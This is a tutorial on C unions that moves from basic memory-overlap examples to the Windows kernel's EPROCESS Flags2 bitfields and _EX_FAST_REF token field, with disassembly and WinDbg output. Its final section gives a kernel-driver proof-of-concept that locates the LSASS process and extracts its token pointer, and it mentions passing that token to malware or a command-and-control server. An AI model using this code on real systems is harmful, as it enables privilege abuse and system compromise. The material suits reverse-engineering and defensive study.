Most people who learn C after a language like Python or JavaScript are stumped by the concept of the union, a native C data type. Unions look like structures, but their behavior could hardly be more different. If C is meant to abstract raw assembly, the union is a subtle reminder that you are, at all times, just one step away from writing low-level code.

This walkthrough will explore unions beyond the surface level. We’ll start with some basics, refer to specifications, then look at a few examples. We’re also going to look at how they appear in the Windows kernel, keeping an eye on offensive tradecraft.

About Unions

Here’s a simple union definition:

union foo_u {
  int i;
  unsigned char c;
};

This union has two fields: an integer i and a byte c. We can use it in code like so (with <stdio.h> included for printf):

int main() {
  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %d\n", foo.i);
}

This will print foo.i: 21 to the console. The disassembly looks something like this:

    1139:       55                      push   rbp
    113a:       48 89 e5                mov    rbp,rsp
    113d:       48 83 ec 10             sub    rsp,0x10
    1141:       c7 45 fc 15 00 00 00    mov    DWORD PTR [rbp-0x4],0x15
    1148:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
    114b:       89 c6                   mov    esi,eax
    114d:       48 8d 05 b0 0e 00 00    lea    rax,[rip+0xeb0]
    1154:       48 89 c7                mov    rdi,rax
    1157:       b8 00 00 00 00          mov    eax,0x0
    115c:       e8 cf fe ff ff          call   1030 <printf@plt>
    1161:       b8 00 00 00 00          mov    eax,0x0
    1166:       c9                      leave
    1167:       c3                      ret

This stores 0x15 (21) at rbp-0x4, the union’s slot on the stack, then loads it into EAX and passes it to printf in ESI.

Now, let’s modify the main function to use the c property:

  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %d\n", foo.i);
  foo.c = 'A';
  printf("foo.c: %c\n", foo.c);

This will print:

foo.i: 21
foo.c: A

Let’s take another look at the disassembly:

    1139:       55                      push   rbp
    113a:       48 89 e5                mov    rbp,rsp
    113d:       48 83 ec 10             sub    rsp,0x10
    1141:       c7 45 fc 15 00 00 00    mov    DWORD PTR [rbp-0x4],0x15
    1148:       8b 45 fc                mov    eax,DWORD PTR [rbp-0x4]
    114b:       89 c6                   mov    esi,eax
    114d:       48 8d 05 b0 0e 00 00    lea    rax,[rip+0xeb0]
    1154:       48 89 c7                mov    rdi,rax
    1157:       b8 00 00 00 00          mov    eax,0x0
    115c:       e8 cf fe ff ff          call   1030 <printf@plt>
    1161:       c6 45 fc 41             mov    BYTE PTR [rbp-0x4],0x41
    1165:       0f b6 45 fc             movzx  eax,BYTE PTR [rbp-0x4]
    1169:       0f b6 c0                movzx  eax,al
    116c:       89 c6                   mov    esi,eax
    116e:       48 8d 05 9a 0e 00 00    lea    rax,[rip+0xe9a]
    1175:       48 89 c7                mov    rdi,rax
    1178:       b8 00 00 00 00          mov    eax,0x0
    117d:       e8 ae fe ff ff          call   1030 <printf@plt>
    1182:       b8 00 00 00 00          mov    eax,0x0
    1187:       c9                      leave
    1188:       c3                      ret

At offset 0x1141, the memory that holds the union (rbp-0x4) is still set to 0x15 (21), just as before. So, the first part of the code has not changed.

However, at offset 0x1161, that same exact memory location is also used to hold 0x41 (‘A’). We can modify each print statement to get a better idea of what’s happening in memory:

  union foo_u foo;
  foo.i = 21;
  printf("foo.i: %016x, foo.c: %016x\n", foo.i, foo.c);
  foo.c = 'A';
  printf("foo.i: %016x, foo.c: %016x\n", foo.i, foo.c);

This will print each field as a zero-padded, 16-digit hex value:

foo.i: 0000000000000015, foo.c: 0000000000000015
foo.i: 0000000000000041, foo.c: 0000000000000041

The same memory location is used for both fields. When you set one field, every other field reads from those same bytes. What’s the point?

You can think of union fields as ways to cast data at some location. When you set any field in a union, it will update some location in memory. In this case, if you access the i field, it will cast that data as an integer. If you access the c field, it will cast that data as a character. Unlike structures, where each field has its own storage, writing to one union field changes what every overlapping field reads back. Only the bytes that the written field occupies are replaced, though: foo.i read 0x41 above only because the upper three bytes of 21 were already zero.

This matches the type’s definition in the ISO C99 standard:

A union type describes an overlapping nonempty set of member objects, each of which has an optionally specified name and possibly distinct type.

Put another way, you can store a DWORD and a BYTE in the same four-byte region. If you had defined this as a struct, the fields would need five bytes, and the struct would occupy eight bytes total (due to alignment padding). Compared to structs, unions are a counterintuitive way to save memory.

This is one major reason why people might use unions: to save memory. The savings can prove crucial on systems with memory restrictions, or for components, like kernels, where you want to optimize memory usage.

One obvious caveat here is that you can lose track of which property is in use at a given time. If you’re not aware of that, you may try to write unions as though they were structs. Consider the following buggy code:

  foo.i = 21;
  printf("My favorite number is %d\n", foo.i);
  foo.c = 'A';
  printf("My favorite number is still %d\n", foo.i);

The “bug”:

My favorite number is 21
My favorite number is still 65

This otherwise-annoying runtime bug could lead to a potentially devastating information leak with a union like:

#include <stdio.h>
#include <string.h>

union UserInfo_u {
  char *username;
  int  birthyear;
  char *password;
  int  creditCardNumber;
};

void 
SetUsername(union UserInfo_u *user);

void
SetSecurePassword(union UserInfo_u *user);

int 
main() {
  union UserInfo_u user;
  SetUsername(&user);
  SetSecurePassword(&user);
  printf("Username: %s\n", user.username);
}

...

// $ gcc userinfo.c -o userinfo
// $ ./userinfo
// Username: S3cure_Pa$$w0rd

For this reason, it’s common to see different patterns that indicate which “property” is currently in use.

An obvious solution is to use a module-level or global variable. An obvious caveat is that you’re now tracking different variables that refer to the same data.

Another solution is to encapsulate the union in a structure which tracks the current type. Consider the example:

struct SomeUnion_u {
  int property;              // selects which member of data is in use
  union {
    unsigned long foo_A;
    unsigned long long foo_B;
    int foo_C;
    unsigned long long foo_D;
    unsigned char foo_E;
  } data;                    // declared as a member, not just a tagged type
};

The property field’s type is honestly arbitrary. An int would let you “select” the current field to use, similar to how an index in an array lets you select which element you want. Unlike an array, a union may hold members of different types, so this might be an acceptable way to abstract data for some purpose.

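With 64-bit alignment (assuming an LP64 platform such as x86-64 Linux, where unsigned long is 8 bytes), the union inside SomeUnion_u takes up only 8 bytes, and the whole struct takes 16 once the property field and its padding are counted. If the union were a struct instead, its five members would take 40 bytes. In an array of such structs, that is five times the space for the payload alone.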

This approach is simple but, unfortunately, also naive. You still have to allocate extra space to work with the “property” field. In addition, because there are so many different types, it should make you wonder if a struct wouldn’t be a better choice, albeit at a storage cost.

For these reasons, you’re unlikely to see unions used as a naive replacement for structures. You are far more likely to see them as a creative way to manipulate data in some memory space. The Windows kernel has a few examples of ways to do this.

Using data bitfields

Let’s consider a use case where you want to manipulate specific bits in a byte, word, dword, or qword. Traditionally, this is handled through bit-mask operations (AND’ing or OR’ing). They work, and they’re good to know, but the syntax is pretty ugly.

Unions let you handle the bits without all the ugly bit-mask syntax.

For example, consider:

union DataWithBitfields_u
{
  unsigned char data;
  struct
  {
    unsigned char bit1:   1;
    unsigned char bit2_3: 2;
    unsigned char bit4:   1;
    unsigned char nibble1:4;
  };
};

Here, we have a one-byte union: an unsigned char, which can be evaluated at face value; and an eight-bit struct, which allows us to operate on bits 1, 2, 3, 4, and the last four bits, independently. This gives us two ways to handle the same data at this byte.

Each bit can be manipulated as a property. However, if you want to evaluate the entire 8-bit (1 byte) space of memory, you can do it by accessing the data field directly. It works because it all refers to the same exact data.

#include <stdio.h>

union DataWithBitfields_u
{
  unsigned char data;
  struct
  {
    unsigned char bit1:1;
    unsigned char bit2_3:2;
    unsigned char bit4:1;
    unsigned char nibble1:4;
  };
};

int 
main()
{
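  union DataWithBitfields_u u;
  u.data = 0;
  printf("%x\n", u.data);  // 0 (pass the byte, not the whole union, to printf)
  u.bit4 = 1;
  printf("%x\n", u.data);  // 8 with GCC or Clang on x86-64; bit-field layout is implementation-defined
  u.bit4 = 0;
  u.bit2_3 = 3;
  printf("%x\n", u.data);  // 6 under the same assumption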
}

Using bitfields in this way is a common development pattern in the EPROCESS structure, a data type used in the Windows kernel to store information about processes. You’ll notice this in the Flags2 field:

struct _EPROCESS
{
    ...
    union
    {
        ULONG Flags2;                              //0x460
        struct
        {
            ULONG JobNotReallyActive:1;            //0x460
            ULONG AccountingFolded:1;              //0x460
            ULONG NewProcessReported:1;            //0x460
            ULONG ExitProcessReported:1;           //0x460
            ...
            ULONG ProcessStateChangeInProgress:1;  //0x460
            ULONG InPrivate:1;                     //0x460
        };
    };

In this way, the properties of Flags2 can be set by accessing any of these fields, most of which refer to a specific bit in the 32-bit structure. Flags2 itself is 32 bits (ULONG) and can be accessed directly to get the four-byte value of all these bits. You can see this in the debugger:

kd> dt _eprocess ffffe48455c32240
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   ...
   +0x460 Flags2           : 0xd000
   +0x460 JobNotReallyActive : 0y0
   +0x460 AccountingFolded : 0y0
   +0x460 NewProcessReported : 0y0
   +0x460 ExitProcessReported : 0y0
   ...
   +0x460 ProcessStateChangeInProgress : 0y0
   +0x460 InPrivate        : 0y0

The developer has two ways to evaluate Flags2: read the four-byte DWORD as a whole, or assess each bit or bitfield individually. Thanks to the union, both views refer to the same data.

Using trivial bitfields

Another approach could use some bytes for data, but leave the last N bits for other data, such as flags or properties.

union AnotherUnion_u 
{
  void *stackLocation;
  unsigned long long flags:3;
};

This union will compile to 8 bytes: enough to hold a 64-bit address. The flags field overlays the lowest 3 bits of that address (with the usual little-endian bit-field layout), so it can hold a value from 0 to 7.

Obviously, this could be a problem on another architecture. But stack slots on 64-bit systems are 8-byte aligned, which means the last hex digit of such an address will always be 0 or 8, and its lowest 3 bits will always be zero. A developer could design their application to “mask out” the last 3 bits and get an address on the stack:

>>> hex(0x01234567 & ~0x7)
'0x1234560'

At the same time, you can use those last three bits to hold some information that may prove useful:

>>> hex(0x01234567 & 0x7)
'0x7'

In this way, neither field in the union effectively clobbers the other. The address is assumed to be 8-byte aligned, so its lowest three bits carry no address information and are free to hold the flags. The two can coexist until the address is needed, at which point the developer masks the flags off.

This is exactly what happens with the _EX_FAST_REF structure in the Windows kernel:

struct _EX_FAST_REF 
{ 
  union 
  { 
    VOID* Object;       //0x0 
    ULONGLONG RefCnt:4; //0x0 
    ULONGLONG Value;    //0x0
  }; 
};

In WinDbg, you can see that all fields have the same offset. As observed from the sample code earlier, this indicates a union type:

kd> dt nt!_EX_FAST_REF
   +0x000 Object           : Ptr64 Void
   +0x000 RefCnt           : Pos 0, 4 Bits
   +0x000 Value            : Uint8B

This union exists within an EPROCESS struct, which, as noted earlier, tracks the state of a given process. To further explore, we can attach WinDbg to a kernel session, open PowerShell as an administrator, and analyze that now-privileged PowerShell process:

kd> dt _eprocess ffffe48455c32240 token
ntdll!_EPROCESS
   +0x4b8 Token : _EX_FAST_REF

The _EX_FAST_REF union holds a pointer to the process’ token. Depending on the process, the token can give you elevated or administrative privileges. Processes like LSASS give you a high-enough privilege for many red-team engagements or real-world malware. Because of that, it is the topic of many writeups.

Unfortunately, the value stored in the union is not the token’s address as-is, because its low bits hold RefCnt:

kd> dt _ex_fast_ref ffffe48455c32240+0x4b8
ntdll!_EX_FAST_REF
   +0x000 Object           : 0xffffbb04`90d2106d Void
   +0x000 RefCnt           : 0y1101
   +0x000 Value            : 0xffffbb04`90d2106d

The RefCnt bits 1101 will need to be dropped in order to get the token’s location:

>>> hex ( 0xffffbb0490d2106d & ~0xf )
'0xffffbb0490d21060'

You can confirm your findings using the “easy way” in WinDbg:

kd> !token 0xffffbb0490d21060
_TOKEN 0xffffbb0490d21060

    // Token data dumps here...

From the attacker’s point of view, it’s useful to know that the underlying data type of an EX_FAST_REF is a union. Knowing this, we can discard the last four bits (RefCnt), because we know they’re extra data, not part of the token’s address.

Exploitation example

We can use the following driver code for WDM to get an LSASS token. This is just proof-of-concept code, littered with manual offsets, and targeting one specific Windows version (Windows 10 22H2). It’s important to note that the Windows Driver Kit does not include many definitions, including the full EPROCESS structure, so we use offsets to get the same data “the hard way.”

QWORD*
GetLsassToken()
{
    PEPROCESS process = PsInitialSystemProcess;

    // EPROCESS.ActiveProcessLinks at offset EPROCESS+0x448
    PLIST_ENTRY activeProcessLinks = (PLIST_ENTRY)((unsigned char *)process+0x448);
    
    // EPROCESS.ImageFileName at offset EPROCESS+0x5a8
    PCHAR imageFileName = (PCHAR)((char *)process + 0x5a8);
    int r = -1;
    QWORD* tokenPtr = NULL;

    while (1) {
        // EPROCESS base is ActiveProcessLinks.Flink - 0x448
        process = (PEPROCESS)(((char *)activeProcessLinks->Flink) - 0x448);
        if (process == PsInitialSystemProcess) break;
        imageFileName = (PCHAR)((char *)process + 0x5a8);
        activeProcessLinks = activeProcessLinks->Flink;
        if (_strnicmp(imageFileName, "lsass.exe", 15) == 0) break;
    }
    
    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
        "[+] Process.ImageFileName: %s\n",
        imageFileName));

    if (_strnicmp(imageFileName, "lsass.exe", 15) != 0) return NULL;

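    // EPROCESS.Token (an EX_FAST_REF) at offset EPROCESS+0x4b8.
    // Read the 8-byte value stored in the field, then clear the low 4 RefCnt bits.
    tokenPtr = (QWORD*)(*(QWORD*)((char*)process + 0x4b8) & ~0xfULL);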

    KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL,
        "[+] Process.Token: %p\n",
        tokenPtr));

    return tokenPtr;
}

This function walks the active process list until lsass.exe is found. It then takes the LSASS token and returns it for further use.

In this code, we access the token’s address from the EPROCESS structure’s EX_FAST_REF field in one statement, which in many ways summarizes the debugging we did earlier:

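    // EPROCESS.Token (an EX_FAST_REF) at offset EPROCESS+0x4b8.
    // Read the 8-byte value stored in the field, then clear the low 4 RefCnt bits.
    tokenPtr = (QWORD*)(*(QWORD*)((char*)process + 0x4b8) & ~0xfULL);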

In a real-world campaign, you could give this token to a second-stage malware or command-and-control server for further system abuse.

The big note here is that we are basically accessing EPROCESS.Token. Because we have some insight into its data type (EX_FAST_REF), we know that the final bits could contain superfluous data. Because we have some insight into token address alignment, we also know that we can safely drop them (& ~0xf).